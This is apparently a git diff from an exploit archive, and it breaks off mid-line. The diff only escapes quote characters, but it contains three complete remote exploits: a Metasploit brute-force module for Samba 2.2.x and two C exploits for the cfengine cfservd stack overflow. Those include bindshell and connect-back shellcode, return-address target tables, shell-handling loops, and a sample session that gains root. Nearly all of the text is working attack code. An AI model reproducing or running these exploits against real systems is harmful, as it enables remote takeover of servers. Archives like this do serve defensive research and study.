md5:cc477378829309d9560b136ca11a89f8 - [ 'Samba 2.2.x - Bruteforce', + [ \'Samba 2.2.x - Bruteforce\', { - 'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack - 'Offset' => 1055, - 'Bruteforce' => + \'PtrToNonZero\' => 0xbfbffff4, # near the bottom of the stack + \'Offset\' => 1055, + \'Bruteforce\' => { - 'Start' => { 'Ret' => 0xbfbffdfc }, - 'Stop' => { 'Ret' => 0xbfa00000 }, - 'Step' => 256 + \'Start\' => { \'Ret\' => 0xbfbffdfc }, + \'Stop\' => { \'Ret\' => 0xbfa00000 }, + \'Step\' => 256 } } ], ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 7 2003' + \'DefaultTarget\' => 0, + \'DisclosureDate\' => \'Apr 7 2003\' )) register_options( @@ -74,15 +74,15 @@ class Metasploit3 < Msf::Exploit::Remote def brute_exploit(addrs) - curr_ret = addrs['Ret'] + curr_ret = addrs[\'Ret\'] begin - print_status("Trying return address 0x%.8x..." % curr_ret) + print_status(\"Trying return address 0x%.8x...\" % curr_ret) connect smb_login # This value *must* be 1988 to allow findrecv shellcode to work - # XXX: I'm not sure the above comment is true... + # XXX: I\'m not sure the above comment is true... pattern = rand_text_english(1988) # See the OSX and Solaris versions of this module for additional @@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2 # (rpmbuild -bp ; edited/reran config.status ; make) - eip_off = target['Offset'] - ptr_to_non_zero = target['PtrToNonZero'] + eip_off = target[\'Offset\'] + ptr_to_non_zero = target[\'PtrToNonZero\'] # Stuff the shellcode into the request pattern[0, payload.encoded.length] = payload.encoded @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # 222 if (IS_IPC(conn)) { # 223 return(ERROR(ERRSRV,ERRaccess)); # 224 } - pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V') + pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\') # We want to avoid crashing on the following two derefences. # @@ -110,23 +110,23 @@ class Metasploit3 < Msf::Exploit::Remote # 117 { # 118 int outsize = set_message(outbuf,0,0,True); # 119 int cmd = CVAL(inbuf,smb_com); - pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V') - pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V') + pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\') + pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\') # This stream covers the framepointer and the return address - #pattern[1199, 400] = [curr_ret].pack('N') * 100 - pattern[eip_off, 4] = [curr_ret].pack('V') + #pattern[1199, 400] = [curr_ret].pack(\'N\') * 100 + pattern[eip_off, 4] = [curr_ret].pack(\'V\') trans = - "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ - "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ + \"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+ + \"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+ + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+ + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+ pattern - # puts "press any key"; $stdin.gets + # puts \"press any key\"; $stdin.gets sock.put(trans) handler @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue EOFError rescue => e - print_error("#{e}") + print_error(\"#{e}\") end end diff --git a/platforms/linux/remote/23182.c b/platforms/linux/remote/23182.c index 3bdd18bee..60e4e70fb 100755 --- a/platforms/linux/remote/23182.c +++ b/platforms/linux/remote/23182.c @@ -4,7 +4,7 @@ cfengine is prone to a stack-based buffer overrun vulnerability. This issue may The vulnerability may be exploited to execute arbitrary code with the privileges of cfservd. A denial of service may also be the result of exploitation attempts as cfservd is multi-threaded and may not be configured to restart itself via a super-server such as inetd. -/*********************************************************************************\ +/*********************************************************************************\\ * jsk / cfengine2-2.0.3 from redhat @@ -16,7 +16,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges * DSR-cfengine.pl :) i think it has some bugs.maybe it is only public * version...... possbile another reasns..... -* the begin buf of exploit could be like "111111". so....DSR... +* the begin buf of exploit could be like \"111111\". so....DSR... * by jsk from Ph4nt0m Security Team * jsk@ph4nt0m.net chat with us ( irc.0x557.org #ph4nt0m) @@ -50,7 +50,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges -\*********************************************************************************/ +\\*********************************************************************************/ @@ -72,7 +72,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges #define D_PORT 5803 -#define D_HOST "www.ph4nt0m.net" +#define D_HOST \"www.ph4nt0m.net\" #define TIMEOUT 10 @@ -80,18 +80,18 @@ The vulnerability may be exploited to execute arbitrary code with the privileges char shell[]= /* bindshell(26112)&, netric. */ - "\x90\x90\x90\x31\xdb\xf7\xe3\x53\x43\x53" - "\x6a\x02\x89\xe1\xb0\x66\x52" - "\x50\xcd\x80\x43\x66\x53\x89" - "\xe1\x6a\x10\x51\x50\x89\xe1" - "\x52\x50\xb0\x66\xcd\x80\x89" - "\xe1\xb3\x04\xb0\x66\xcd\x80" - "\x43\xb0\x66\xcd\x80\x89\xd9" - "\x93\xb0\x3f\xcd\x80\x49\x79" - "\xf9\x52\x68\x6e\x2f\x73\x68" - "\x68\x2f\x2f\x62\x69\x89\xe3" - "\x52\x53\x89\xe1\xb0\x0b\xcd" - "\x80"; + \"\\x90\\x90\\x90\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\" + \"\\x6a\\x02\\x89\\xe1\\xb0\\x66\\x52\" + \"\\x50\\xcd\\x80\\x43\\x66\\x53\\x89\" + \"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\" + \"\\x52\\x50\\xb0\\x66\\xcd\\x80\\x89\" + \"\\xe1\\xb3\\x04\\xb0\\x66\\xcd\\x80\" + \"\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\" + \"\\x93\\xb0\\x3f\\xcd\\x80\\x49\\x79\" + \"\\xf9\\x52\\x68\\x6e\\x2f\\x73\\x68\" + \"\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\" + \"\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\" + \"\\x80\"; struct op_plat_st { @@ -112,15 +112,15 @@ struct op_plat_st __pl_form[]= -{0,"red 8.0",0x4029cc2c,0}, +{0,\"red 8.0\",0x4029cc2c,0}, -{1,"red 9.0(cmp)",0x4029cda0,0}, +{1,\"red 9.0(cmp)\",0x4029cda0,0}, -{2,"red 7.2 (Compile)",0x44444444,0}, +{2,\"red 7.2 (Compile)\",0x44444444,0}, -{3,"red 7.3 (Compile)",0x44444444,0}, +{3,\"red 7.3 (Compile)\",0x44444444,0}, NULL @@ -136,17 +136,17 @@ void getshell(char *,unsigned short); void printe(char *,short); -void sig_alarm(){printe("alarm/timeout hit.",1);} +void sig_alarm(){printe(\"alarm/timeout hit.\",1);} void banrl() { -fprintf(stdout,"\n cfengine2-2.0.3:server remote buffer overflow exploit)\n"); +fprintf(stdout,\"\\n cfengine2-2.0.3:server remote buffer overflow exploit)\\n\"); -fprintf(stdout," by jsk.\n"); +fprintf(stdout,\" by jsk.\\n\"); -fprintf(stdout," Greets Br-00t and all #ph4nt0m .\n"); +fprintf(stdout,\" Greets Br-00t and all #ph4nt0m .\\n\"); } @@ -158,17 +158,17 @@ void x_fp_rm_usage(char *x_fp_rm) int __t_xmp=0; -fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm); +fprintf(stdout,\"\\n Usage: %s -[option] [arguments]\\n\\n\",x_fp_rm); -fprintf(stdout,"\t -h [hostname] - target host.\n"); +fprintf(stdout,\"\\t -h [hostname] - target host.\\n\"); -fprintf(stdout,"\t -p [port] - port number.\n"); +fprintf(stdout,\"\\t -p [port] - port number.\\n\"); -fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n"); +fprintf(stdout,\"\\t -s [addr] - &shellcode address.\\n\\n\"); -fprintf(stdout," Example> %s -h target_hostname -p 8000 -t num\n",x_fp_rm); +fprintf(stdout,\" Example> %s -h target_hostname -p 8000 -t num\\n\",x_fp_rm); -fprintf(stdout," Select target number>\n\n"); +fprintf(stdout,\" Select target number>\\n\\n\"); for(;;) @@ -182,7 +182,7 @@ else { -fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys); +fprintf(stdout,\"\\t {%d} %s\\n\",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys); } @@ -190,7 +190,7 @@ __t_xmp++; } -fprintf(stdout,"\n"); +fprintf(stdout,\"\\n\"); exit(0); } @@ -218,7 +218,7 @@ u_long retaddr=__pl_form[type].retaddr; (void)banrl(); -while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF) +while((whlp=getopt(argc,argv,\"T:t:H:h:P:p:IiXx\"))!=EOF) { @@ -228,9 +228,9 @@ switch(whlp) { -case 'T': +case \'T\': -case 't': +case \'t\': if((type=atoi(optarg))<6) @@ -248,9 +248,9 @@ break; -case 'H': +case \'H\': -case 'h': +case \'h\': memset((char *)hostname,0,sizeof(hostname)); @@ -260,9 +260,9 @@ break; -case 'P': +case \'P\': -case 'p': +case \'p\': port=atoi(optarg); @@ -270,17 +270,17 @@ break; -case 'I': +case \'I\': -case 'i': +case \'i\': -fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]); +fprintf(stderr,\" Try `%s -?\' for more information.\\n\\n\",argv[0]); exit(-1); -case '?': +case \'?\': (void)x_fp_rm_usage(argv[0]); @@ -302,35 +302,35 @@ if(!strcmp(hostname,D_HOST)) { -fprintf(stdout," [+] Hostname: %s\n",hostname); +fprintf(stdout,\" [+] Hostname: %s\\n\",hostname); -fprintf(stdout," [+] Port num: %d\n",port); +fprintf(stdout,\" [+] Port num: %d\\n\",port); -fprintf(stdout," [+] Retaddr address: %p\n",retaddr); +fprintf(stdout,\" [+] Retaddr address: %p\\n\",retaddr); } -fprintf(stdout," [1] #1 Set codes.\n"); +fprintf(stdout,\" [1] #1 Set codes.\\n\"); if(!(buf=(char *)malloc(BUFSIZE+1))) - printe("getcode(): allocating memory failed.",1); + printe(\"getcode(): allocating memory failed.\",1); memset(buf, 0x90, BUFSIZE); - buf[0] = '1'; - buf[1] = '1'; - buf[2] = '1'; - buf[3] = '1'; - buf[4] = '1'; - buf[5] = '1'; - buf[6] = '1'; + buf[0] = \'1\'; + buf[1] = \'1\'; + buf[2] = \'1\'; + buf[3] = \'1\'; + buf[4] = \'1\'; + buf[5] = \'1\'; + buf[6] = \'1\'; memset(buf+7,0x90,636); @@ -354,17 +354,17 @@ fprintf(stdout," [1] #1 Set codes.\n"); memcpy(&buf[BUFSIZE-(9*sizeof(retaddr))], &retaddr, sizeof(retaddr)); - fprintf(stdout," [1] #1 Set socket.\n"); + fprintf(stdout,\" [1] #1 Set socket.\\n\"); sd=sock_connect(hostname,port); -fprintf(stdout," [1] #1 Send codes.\n"); +fprintf(stdout,\" [1] #1 Send codes.\\n\"); write(sd,buf,BUFSIZE); close(sd); sleep(1); -fprintf(stdout," [1] #3 Get shell.\n"); +fprintf(stdout,\" [1] #3 Get shell.\\n\"); getshell(hostname,26112); exit(0); @@ -386,13 +386,13 @@ unsigned short port){ s.sin_port=htons(port); - printf("[*] attempting to connect: %s:%d.\n",hostname,port); + printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port); if((s.sin_addr.s_addr=inet_addr(hostname))){ if(!(t=gethostbyname(hostname))) - printe("couldn't resolve hostname.",1); + printe(\"couldn\'t resolve hostname.\",1); memcpy((char*)&s.sin_addr,(char*)t->h_addr, @@ -406,11 +406,11 @@ unsigned short port){ if(connect(sock,(struct sockaddr *)&s,sizeof(s))) - printe("netris connection failed.",1); + printe(\"netris connection failed.\",1); alarm(0); - printf("[*] successfully connected: %s:%d.\n",hostname,port); + printf(\"[*] successfully connected: %s:%d.\\n\",hostname,port); return(sock); @@ -428,11 +428,11 @@ void getshell(char *hostname,unsigned short port){ struct sockaddr_in sa; - printf("[*] checking to see if the exploit was successful.\n"); + printf(\"[*] checking to see if the exploit was successful.\\n\"); if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) - printe("getshell(): socket() failed.",1); + printe(\"getshell(): socket() failed.\",1); sa.sin_family=AF_INET; @@ -440,7 +440,7 @@ void getshell(char *hostname,unsigned short port){ if(!(he=gethostbyname(hostname))) - printe("getshell(): couldn't resolve.",1); + printe(\"getshell(): couldn\'t resolve.\",1); memcpy((char *)&sa.sin_addr,(char *)he->h_addr, @@ -454,11 +454,11 @@ void getshell(char *hostname,unsigned short port){ alarm(TIMEOUT); - printf("[*] attempting to connect: %s:%d.\n",hostname,port); + printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){ - printf("[!] connection failed: %s:%d.\n",hostname,port); + printf(\"[!] connection failed: %s:%d.\\n\",hostname,port); return; @@ -466,11 +466,11 @@ void getshell(char *hostname,unsigned short port){ alarm(0); - printf("[*] successfully connected: %s:%d.\n\n",hostname,port); + printf(\"[*] successfully connected: %s:%d.\\n\\n\",hostname,port); signal(SIGINT,SIG_IGN); - write(sock,"uname -a;id\n",13); + write(sock,\"uname -a;id\\n\",13); while(1){ @@ -482,17 +482,17 @@ void getshell(char *hostname,unsigned short port){ if(select(sock+1,&fds,0,0,0)<1) - printe("getshell(): select() failed.",1); + printe(\"getshell(): select() failed.\",1); if(FD_ISSET(0,&fds)){ if((r=read(0,buf,4096))<1) - printe("getshell(): read() failed.",1); + printe(\"getshell(): read() failed.\",1); if(write(sock,buf,r)!=r) - printe("getshell(): write() failed.",1); + printe(\"getshell(): write() failed.\",1); } @@ -516,9 +516,9 @@ void getshell(char *hostname,unsigned short port){ void printe(char *err,short e){ - fprintf(stdout," [-] Failed.\n\n"); + fprintf(stdout,\" [-] Failed.\\n\\n\"); - fprintf(stdout," Happy Exploit ! :-)\n\n"); + fprintf(stdout,\" Happy Exploit ! :-)\\n\\n\"); diff --git a/platforms/linux/remote/23183.c b/platforms/linux/remote/23183.c index 513cc5c1f..3f1b8b7be 100755 --- a/platforms/linux/remote/23183.c +++ b/platforms/linux/remote/23183.c @@ -10,11 +10,11 @@ The vulnerability may be exploited to execute arbitrary code with the privileges * Date: 4 November 2003 * * * * Yet another version.. no big deal.. nothing special.. * - * just an extra built-in support for 'connect-back' shell.. * - * so that I dun need 'nc -l -p 31337' stuffs... duh !?! * + * just an extra built-in support for \'connect-back\' shell.. * + * so that I dun need \'nc -l -p 31337\' stuffs... duh !?! * * * * Anyway.. credit should go to Nick Cleaton who disovered * - * this nice little 'bug'... ;) * + * this nice little \'bug\'... ;) * * * * As usual, use it at your very own risk... * * But then again, I really doubt this code will work for you * @@ -48,11 +48,11 @@ Transaction Receive [88888][] RecvSocketStream(8888) (Concatenated 4192 from stream) Transmission empty... -Received: ['\x90'......1???QQQ?f????PPfha,fS?SRQ???1?? +Received: [\'\\x90\'......1???QQQ?f????PPfha,fS?SRQ???1?? 1??1?R?f?????0?1??PW?f?????9?@1 ?1????1??? 1???1?h//shh/bin?PS??1??1 ?? on socket -1869574000 Transaction Send[t 20][Packed text] -cfservd: Couldn't send +cfservd: Couldn\'t send cfservd: send cfservd: Closing connection @@ -68,7 +68,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ] Tested to work against cfservd 2.0.7 on Redhat 8.0 -> Using return address of 0x4029eeff --> 'Connecting' mode... +-> \'Connecting\' mode... -> Exploit string sent. Waiting for a shell... -> Connecting to shell at 192.168.1.1:24876 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys), @@ -89,7 +89,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ] Tested to work against cfservd 2.0.7 on Redhat 8.0 -> Using return address of 0x4029eeff --> 'Listening' mode...( port: 24876 ) +-> \'Listening\' mode...( port: 24876 ) -> Exploit string sent.... -> Waiting for connection.... -> Connection from: 192.168.1.1 @@ -132,61 +132,61 @@ exit #define SC_SIZE_1 sizeof(bindport) #define SC_SIZE_2 sizeof(connback) -#define CMD "/usr/bin/id\n" +#define CMD \"/usr/bin/id\\n\" /* - * Shellcode were shamelessly ripped from netric's code... =p + * Shellcode were shamelessly ripped from netric\'s code... =p */ char bindport[]= - "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" - "\x06\x51\xb1\x01\x51\xb1\x02\x51" - "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" - "\x89\xc1\x31\xc0\x31\xdb\x50\x50" - "\x50\x66\x68\x61\x2c\xb3\x02\x66" - "\x53\x89\xe2\xb3\x10\x53\xb3\x02" - "\x52\x51\x89\xca\x89\xe1\xb0\x66" - "\xcd\x80\x31\xdb\x39\xc3\x74\x05" - "\x31\xc0\x40\xcd\x80\x31\xc0\x50" - "\x52\x89\xe1\xb3\x04\xb0\x66\xcd" - "\x80\x89\xd7\x31\xc0\x31\xdb\x31" - "\xc9\xb3\x11\xb1\x01\xb0\x30\xcd" - "\x80\x31\xc0\x31\xdb\x50\x50\x57" - "\x89\xe1\xb3\x05\xb0\x66\xcd\x80" - "\x89\xc6\x31\xc0\x31\xdb\xb0\x02" - "\xcd\x80\x39\xc3\x75\x40\x31\xc0" - "\x89\xfb\xb0\x06\xcd\x80\x31\xc0" - "\x31\xc9\x89\xf3\xb0\x3f\xcd\x80" - "\x31\xc0\x41\xb0\x3f\xcd\x80\x31" - "\xc0\x41\xb0\x3f\xcd\x80\x31\xc0" - "\x50\x68\x2f\x2f\x73\x68\x68\x2f" - "\x62\x69\x6e\x89\xe3\x8b\x54\x24" - "\x08\x50\x53\x89\xe1\xb0\x0b\xcd" - "\x80\x31\xc0\x40\xcd\x80\x31\xc0" - "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; + \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\" + \"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\" + \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\" + \"\\x89\\xc1\\x31\\xc0\\x31\\xdb\\x50\\x50\" + \"\\x50\\x66\\x68\\x61\\x2c\\xb3\\x02\\x66\" + \"\\x53\\x89\\xe2\\xb3\\x10\\x53\\xb3\\x02\" + \"\\x52\\x51\\x89\\xca\\x89\\xe1\\xb0\\x66\" + \"\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x05\" + \"\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\\x50\" + \"\\x52\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\" + \"\\x80\\x89\\xd7\\x31\\xc0\\x31\\xdb\\x31\" + \"\\xc9\\xb3\\x11\\xb1\\x01\\xb0\\x30\\xcd\" + \"\\x80\\x31\\xc0\\x31\\xdb\\x50\\x50\\x57\" + \"\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\" + \"\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\" + \"\\xcd\\x80\\x39\\xc3\\x75\\x40\\x31\\xc0\" + \"\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x31\\xc0\" + \"\\x31\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\" + \"\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\" + \"\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\" + \"\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\" + \"\\x62\\x69\\x6e\\x89\\xe3\\x8b\\x54\\x24\" + \"\\x08\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\" + \"\\x80\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\" + \"\\x89\\xf3\\xb0\\x06\\xcd\\x80\\xeb\\x99\"; char connback[]= - "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" - "\x06\x51\xb1\x01\x51\xb1\x02\x51" - "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" - "\x89\xc2\x31\xc0\x31\xc9\x51\x51" - "\x68\x41\x42\x43\x44\x66\x68\xb0" - "\xef\xb1\x02\x66\x51\x89\xe7\xb3" - "\x10\x53\x57\x52\x89\xe1\xb3\x03" - "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" - "\x74\x06\x31\xc0\xb0\x01\xcd\x80" - "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" - "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" - "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" - "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" - "\x50\x68\x6e\x2f\x73\x68\x68\x2f" - "\x2f\x62\x69\x89\xe3\x50\x53\x89" - "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" - "\x01\xcd\x80"; + \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\" + \"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\" + \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\" + \"\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\" + \"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\" + \"\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\" + \"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\" + \"\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\" + \"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\" + \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\" + \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\" + \"\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\" + \"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\" + \"\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\" + \"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\" + \"\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\" + \"\\x01\\xcd\\x80\"; /* * Ugly select() stuffs.... - * Modified (a little) from TESO's code.. + * Modified (a little) from TESO\'s code.. * to support connect back shell.... ;) */ @@ -206,7 +206,7 @@ void doshell(int sock) { if (FD_ISSET (0, &rfds)) { l = read (0, buf, sizeof (buf)); if (l <= 0) { - fprintf(stdout,"-> Connection closed by local user\n"); + fprintf(stdout,\"-> Connection closed by local user\\n\"); exit (EXIT_FAILURE); } sent=0; @@ -222,10 +222,10 @@ void doshell(int sock) { if (FD_ISSET (sock, &rfds)) { l = read (sock, buf, sizeof (buf)); if (l == 0) { - fprintf(stdout,"-> Connection closed by remote host.\n"); + fprintf(stdout,\"-> Connection closed by remote host.\\n\"); exit (EXIT_FAILURE); } else if (l < 0) { - fprintf(stdout,"-> read() error\n"); + fprintf(stdout,\"-> read() error\\n\"); exit (EXIT_FAILURE); } write (1, buf, l); @@ -255,38 +255,38 @@ void changeport(char *code, int port, int offset) { void sendcmd(int sock) { if (send(sock,CMD,strlen(CMD),0)<0) { - err_exit("-> send() error"); + err_exit(\"-> send() error\"); } } void usage(char *s) { - fprintf(stdout,"\nUsage: %s [-options]\n\n",s); - fprintf(stdout,"\t-r\tSize of 'return addresses'\n"); - fprintf(stdout,"\t-b\tThe overall size of the buffer\n"); - fprintf(stdout,"\t-a\tAlignment size [0~3]\n"); - fprintf(stdout,"\t-t\tTarget's port\n"); - fprintf(stdout,"\t-s\tPort to bind shell to (in 'connecting' mode), or\n"); - fprintf(stdout,"\t\tPort for shell to connect back (in 'listening' mode)\n"); - fprintf(stdout,"\t-o\tOffset from the default return address\n"); - fprintf(stdout,"\t-h\tTarget's IP\n"); - fprintf(stdout,"\t-l\tListening for shell connecting\n"); - fprintf(stdout,"\t\tback to port specified by '-s' switch\n"); - fprintf(stdout,"\t-i\tIP for shell to connect back\n"); - fprintf(stdout,"\t-T\tNumber of seconds to wait for connection\n\n"); - fprintf(stdout,"\tNotes:\n\t======\n\t'-h' is mandatory\n"); - fprintf(stdout,"\t'-i' is mandatory if '-l' is specified\n\n"); + fprintf(stdout,\"\\nUsage: %s [-options]\\n\\n\",s); + fprintf(stdout,\"\\t-r\\tSize of \'return addresses\'\\n\"); + fprintf(stdout,\"\\t-b\\tThe overall size of the buffer\\n\"); + fprintf(stdout,\"\\t-a\\tAlignment size [0~3]\\n\"); + fprintf(stdout,\"\\t-t\\tTarget\'s port\\n\"); + fprintf(stdout,\"\\t-s\\tPort to bind shell to (in \'connecting\' mode), or\\n\"); + fprintf(stdout,\"\\t\\tPort for shell to connect back (in \'listening\' mode)\\n\"); + fprintf(stdout,\"\\t-o\\tOffset from the default return address\\n\"); + fprintf(stdout,\"\\t-h\\tTarget\'s IP\\n\"); + fprintf(stdout,\"\\t-l\\tListening for shell connecting\\n\"); + fprintf(stdout,\"\\t\\tback to port specified by \'-s\' switch\\n\"); + fprintf(stdout,\"\\t-i\\tIP for shell to connect back\\n\"); + fprintf(stdout,\"\\t-T\\tNumber of seconds to wait for connection\\n\\n\"); + fprintf(stdout,\"\\tNotes:\\n\\t======\\n\\t\'-h\' is mandatory\\n\"); + fprintf(stdout,\"\\t\'-i\' is mandatory if \'-l\' is specified\\n\\n\"); exit(0); } void sigalrm() { - fprintf(stdout,"-> Nope.. I ain't waiting any longer.. =p\n"); + fprintf(stdout,\"-> Nope.. I ain\'t waiting any longer.. =p\\n\"); exit(0); } int main(int argc, char *argv[]) { char opt; - char *buf, *ptr, *ip=""; + char *buf, *ptr, *ip=\"\"; struct sockaddr_in sockadd; int i, s1, s2, i_len, ok=0, mode=0; int time_out=TIME_OUT, scsize=SC_SIZE_1; @@ -296,48 +296,48 @@ int main(int argc, char *argv[]) { if (argc<2) { usage(argv[0]); } - while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) { + while ((opt=getopt(argc,argv,\"i:r:b:a:h:t:s:o:T:l\"))!=EOF) { switch(opt) { - case 'i': + case \'i\': ip=optarg; changeip(ip); break; - case 'l': + case \'l\': mode=1; scsize=SC_SIZE_2; break; - case 'T': + case \'T\': time_out=atoi(optarg); break; - case 'b': + case \'b\': buffsize=atoi(optarg); break; - case 'a': + case \'a\': align=atoi(optarg); break; - case 'h': + case \'h\': ok=1; sockadd.sin_addr.s_addr = inet_addr(optarg); break; - case 'r': + case \'r\': retsize=atoi(optarg); break; - case 't': + case \'t\': t_port=atoi(optarg); break; - case 's': + case \'s\': s_port=atoi(optarg); break; - case 'o': + case \'o\': offset=atoi(optarg); break; @@ -347,16 +347,16 @@ int main(int argc, char *argv[]) { } } - if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); } + if (!ok || (mode&&((strcmp(ip,\"\")==0)) ) ) { usage(argv[0]); } if (!(buf=malloc(buffsize+1))) { - err_exit("-> malloc() error"); + err_exit(\"-> malloc() error\"); } ret_addr=RET_ADDR-offset; - fprintf(stdout,"\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\n"); - fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n"); - fprintf(stdout,"-> Using return address of 0x%08x\n", ret_addr); + fprintf(stdout,\"\\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\\n\"); + fprintf(stdout,\"Tested to work against cfservd 2.0.7 on Redhat 8.0\\n\\n\"); + fprintf(stdout,\"-> Using return address of 0x%08x\\n\", ret_addr); ptr=buf; for(i=0;i socket error"); + err_exit(\"-> socket error\"); } if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { - err_exit("-> connect() error"); + err_exit(\"-> connect() error\"); } if (mode) { - fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port); + fprintf(stdout,\"-> \'Listening\' mode...( port: %d )\\n\",s_port); if (fork()==0) { sleep(2); if (send(s1,buf,buffsize,0)<0) { - err_exit("-> send() error"); + err_exit(\"-> send() error\"); } - fprintf(stdout,"-> Exploit string sent....\n"); + fprintf(stdout,\"-> Exploit string sent....\\n\"); exit(0); } @@ -405,7 +405,7 @@ int main(int argc, char *argv[]) { alarm(time_out); if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) { - err_exit("-> socket error"); + err_exit(\"-> socket error\"); } memset(&sockadd,0,sizeof(sockadd)); @@ -415,26 +415,26 @@ int main(int argc, char 